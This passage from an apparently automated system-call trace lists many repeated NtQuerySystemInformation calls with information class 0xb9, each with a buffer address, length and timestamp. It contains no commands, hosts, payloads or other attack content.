NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0227.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0227.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0227.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x28, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.150] 